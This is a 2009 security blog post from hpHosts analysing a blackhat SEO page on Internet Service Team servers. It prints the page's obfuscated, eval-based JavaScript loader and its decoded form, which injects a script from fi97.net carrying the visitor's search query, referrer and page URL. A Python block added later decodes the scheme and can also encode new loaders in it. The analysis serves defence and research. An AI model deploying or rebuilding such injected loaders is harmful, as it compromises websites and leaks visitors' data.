Blog for hpHosts, and whatever else I feel like writing about ....

Tuesday 5 May 2009

IST (Internet Service Team - *.internetserviceteam.com) in blackhat SEO campaign - again

So much has been documented on the IST over the years, that mentioning them now, just doesn't give the same sense of "wow" as it used to - we're so used to the crap they get up to now, that it just doesn't surprise us anymore.

The latest I've come across is certainly nothing new - blackhat SEO has been going on for years - but it is interesting in that the domain it points to (fi97.net) doesn't actually seem to resolve (kinda defeats the object there guys). OpenDNS, even after refreshing the cache, shows 3 servers returning "Did not resolve" and the other 3 returning a "SERVFAIL" error.

There's no denying that the IST are involved in this, as the IP PTR kinda gives it away. However, I do find their code a little interesting (though not as interesting as those that use obfuscation, as it takes the challenge away).

Loading the site listed in Google, in vURL shows;

*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://test-file-and-windows-defender.ff7test5.us/
Server IP: 78.159.122.252 [ 78.159.122.252.internetserviceteam.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 06 May 2009
Time: 03:01:21:01
*****************************************************************

<script language="Javascript" type="text/javascript">var ddxform=[];ddxform[0] = "http://go.live.com/item?colThkJGmjBdvXcrLlFjKNONQjkNkSEGzNLipNOSuGpNrjmnqXwkLrJNaSzGpNcpKWuNJSTGTNmlbX";ddxform[1] = "http://go.live.com/item?UTLkAVLabYLhrkzNzSEGuNVjclJNfSuGfNVlmmhkwbBglZkNaSTGkNcpkNkSJGfNbTmlPRcjaNlPAhBoUTVkuG";ddxform[2] = "http://go.live.com/item?LkFXvYTGAjEGbWchlVrnrflXmgBmkUwkKXUYFXQkmkvXQklhJGwoKTGkuGmjGngXQkcraGvjJGfNzNUhuGQogTLkpGwilThkwmQlTG";ddxform[3] = "http://go.live.com/item?qjOGQggXmpEGKnLkQkvTQrJOuPUhkGmigTLkmmGlzGvjuGVkPXFYaUmlBiceQbVmOOJNblfNpPPhOGhblY";ddxform[4] = "http://go.live.com/item?TGJOLigTVkVmQlfUBevXBgbZwmwaFkzXEPkGBtzGfGuGkGmoFTBkaGvWKTmmlTLlaGbjOGVgUXLpfGAnmkLkATGrkO";ddxform[5] = "http://go.live.com/item?fPPhuGJGuGFWlTGmPTQlkGPjpGcigTBkQmhlFNEXgPzUwlriheGbcmJOkNpMTNuP";ddxform[6] = "http://go.live.com/item?vhkGEGaGvYrhQkkGEOLoATGkOGhbvjaWPhhbgivWATwmATmlzUmevXQglZVmca";ddxform[7] = "http://go.live.com/item?ghLbJRzRaPzGQtEGpGuGpGkGEGOGmovTckpGPWATQmvTJGvjJGmgqXVpkGvnGkrkgTrrTOfPPhJGOGkGfGkG";ddxform[8] = "http://go.live.com/item?OGfGFWlThmbTaGKjOGAWATrmlTQlFNhbbPaULlwihecbrmpOTNgjkNkPqhuGEGfGzGkGpGEGqY";ddxform[9] = "http://go.live.com/item?whmkTGTOBogTLkfGrcKjkWghkGrcliBjLdgXGrVlpUceqXcggZVmraAhEGGcaRaROPTGaGpGfGJG";ddxform[10] = "http://go.live.com/item?zGzGJGEGJGhbPYpGOObWbTQmvTbNkWvPfGgjKjJGQjrdKXVrmlKNVcFPOPJjhtwjrnUXhkcrfGUjuGbW";ddxform[11] = "http://go.live.com/item?vTQmvTANaXPPKhkGAUwkbXUThdUhhvPhTGJGJGEGTGkGTGVbqYaG";ddxform[12] = "http://go.live.com/item?pOwjcnqXVkQrJGuHUjEGfNfNkPzGlUhkKXlTrdAhfGfGpGJGcvAhGv";ddxform[13] = "http://go.live.com/item?UhGjhnlXhkhrzGbjaGrnwgbXVlAVlThigXuOrjQnFXGkwrJPPhOGwj";ddxform[14] = "http://go.live.com/item?wngXVkrrOGbjEGUXmlgVbTriAXuOrjwnbXBkGrkPUhaGaGEGLoATrkzGvWPjwgPXcppGlqPTwmPXPhEGaGOGaGBkmsrsbjqWTU";ddxform[15] = "http://go.live.com/item?AZUXLmFGBbwflXTOTPFhOGpGuGOGKWLhKVhnBfAXQgBmpUQphkGbhmgXTOaIPiBlUVBkkIzRTIwbBiQmaGrlhk";ddxform[16] = 
"http://go.live.com/item?lVPjpNVacmQmwiPguVOVFYBbvfKdEUwgPXwmTVQcclhkuUViBaViKlGnmbUWljAWQbBkuMPZwkVhGnQi";ddxform[17] = "http://go.live.com/item?qjvZlZcefMGdUXGrBpLhGkKWljzMrhhdrpUjpMmjmnPXhkQrqjTIkRrjGngXckVrzRpIaMGkUXbYlXBkKXVkljaIuR";ddxform[18] = "http://go.live.com/item?gXQlAVATciKXuOlWBhKVmnQfbXVgVmfUQkvXvYUXhkwkUXwkTPJRpIkMLaQkKXPYFjkIpRKXclKVUTGi";ddxform[19] = "http://go.live.com/item?lXuOGehhqVPTcmQbrhVgaULaVkAXKYEPTRTIuMLkKjpIuRckLshsaRuIfNKkbiuIfRJIzVBlAVGkuIOR";ddxform[20] = "http://go.live.com/item?uIGbBiVmqkkITPqh";var pukne='';for (var i=0;i<ddxform.length;i++){var elmpr=ddxform[i];pukne=pukne+elmpr.substr(elmpr.indexOf('?')+1);}var bkuve='';for (var erden=0;erden<pukne.length;erden+=2){var kuhnr=pukne.charCodeAt(erden)-97;if(kuhnr<0)kuhnr+=58;kuhnr=kuhnr%5;var ircmu=pukne.charCodeAt(erden+1)-97;if(ircmu<0)ircmu+=58;var zbokp=kuhnr*52+ircmu;bkuve+=String.fromCharCode(zbokp);};eval(bkuve);</script>


http://vurl.mysteryfcm.co.uk/?url=602924

This decodes to;

var qkeys=['q', 'p', 'query', 'wd', 'searchfor', 'qs', 'string', 'w', 'as_q'];var ref = document.referrer; var query = ''; var parts = new Array(); parts = ref.split('?'); if (parts.length>1) { var datas = new Array(); datas = parts[1].split('&'); for (var i=0;i<datas.length;i++) { var data = new Array(); data = datas[i].split('='); for (var j=0; j<qkeys.length; j++) if (data[0] == qkeys[j]) {query = data[1]; break;}; if (query != '') break; };};query = unescape(query); query = escape(query); var d=new Date; rzz=d.getTime(); document.write("<scr"+"ipt src='http://fi97.net/jsr.php?uid=dir&group=ggl&keyword=&okw=&query="+query+"&referer="+escape(document.referrer)+"&href="+escape(location.href)+"&r="+rzz+"'><"+"/scr"+"ipt>");
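As an added illustration (not the blog's own code, and not the IST's), here is a Python re-implementation of the loader's decode loop without the eval, so the go.live.com "item?" strings can be turned back into the script offline; the first ddxform[] entry is copied from the capture above, while encode_payload/build_sample_script are my own inverse, constructed only to round-trip a sample.

```python
import re
from typing import List

# First ddxform[] entry, copied verbatim from the captured script above.
PAGE_URL_0 = ("http://go.live.com/item?colThkJGmjBdvXcrLlFjKNONQjkNkSEGzN"
              "LipNOSuGpNrjmnqXwkLrJNaSzGpNcpKWuNJSTGTNmlbX")
URL_RE = re.compile(r'ddxform\[\d+\]\s*=\s*"([^"]+)"')

def letter_value(ch: str) -> int:
    """Mirror of the loader's charCodeAt(i)-97 step with its +58 wrap:
    'a'..'z' -> 0..25, 'A'..'Z' -> 26..51."""
    v = ord(ch) - 97
    if v < 0:
        v += 58
    return v

def decode_payload(urls: List[str]) -> str:
    """The loader's second loop, minus eval(): join everything after '?',
    then read letter pairs as base-52 digits (high digit taken mod 5)."""
    blob = "".join(u[u.index("?") + 1:] for u in urls)
    out = []
    for i in range(0, len(blob) - 1, 2):   # a dangling odd letter is dropped
        hi = letter_value(blob[i]) % 5
        lo = letter_value(blob[i + 1])
        out.append(chr(hi * 52 + lo))
    return "".join(out)

def decode_script(script_text: str) -> str:
    """Pull the ddxform[] strings out of a captured <script> and decode them."""
    return decode_payload(URL_RE.findall(script_text))

def value_letter(v: int) -> str:
    return chr(97 + v) if v < 26 else chr(65 + v - 26)

def encode_payload(plain: str, seed: int = 0) -> str:
    """My inverse transform (assumption, for testing only). The high digit
    only matters mod 5, so several letters encode it; that slack is what
    makes the real strings look random."""
    out = []
    for n, ch in enumerate(plain):
        code = ord(ch)
        if code >= 5 * 52:
            raise ValueError("scheme only covers code points below 260")
        hi, lo = divmod(code, 52)
        hi_choice = hi + 5 * ((n + seed) % 10)   # any value == hi (mod 5), < 52
        out.append(value_letter(hi_choice) + value_letter(lo))
    return "".join(out)

def build_sample_script(plain: str, chunk: int = 40) -> str:
    """Constructed miniature of the loader, split across ddxform[] entries."""
    enc = encode_payload(plain)
    parts = [enc[i:i + chunk] for i in range(0, len(enc), chunk)]
    return "".join(f'ddxform[{i}] = "http://go.live.com/item?{p}";'
                   for i, p in enumerate(parts))
```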


At this point, I'm a little unsure as to the point of the go.live.com URLs being there, as they don't actually seem to lead to anything (meant to lead to spamvertised live.com profiles perhaps? who knows - they just lead me to http://home.live.com/?showunauth=1 at the moment, irrespective of whether I'm signed in to live.com or not).

One other site seems to be on the same IP as this, kitehotel.net, but that's failing to resolve too for some reason. It could be a problem with the NS, or it could be a problem at OpenDNS's end (unlikely, since other DNS servers I've checked are showing the same thing); it is, at this point, irrelevant.

/edit 04:41 06-05-2009

Added vURL Online results.
